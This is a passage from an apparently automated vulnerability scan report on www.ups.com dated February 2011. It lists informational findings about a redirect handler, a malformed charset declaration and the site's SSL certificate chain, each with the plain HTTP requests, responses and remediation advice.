Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:16:04 GMT
Server: Apache
Last-Modified: Wed, 19 Mar 2003 16:32:36 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/plain


10.2. https://www.ups.com/homepage/ddhandler/handler.jsp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:16 GMT
Server: Apache
Content-Length: 167
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.ups.com/">
</head>
<title>UPS.com</title>
<body>
Forwarding to selected URL...
</body>
</html>

11. HTML uses unrecognised charset  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ups.com
Path:   /sf

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /sf?loc=en_US&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<META NAME='SWFid.SF' CONTENT='sf'>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html"; charset=utf-8">
<link rel="stylesheet" type="text/css" media="screen" href="/assets/framework/jquery/plugin/jqueryui/ui.all.css?V=0111">
...[SNIP]...

12. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ups.com
Issued by:  VeriSign Class 3 Secure Server CA
Valid from:  Sun Apr 12 19:00:00 CDT 2009
Valid to:  Wed Apr 13 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Jan 18 18:00:00 CST 2005
Valid to:  Sun Jan 18 17:59:59 CST 2015

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 19:32:58 CST 2011.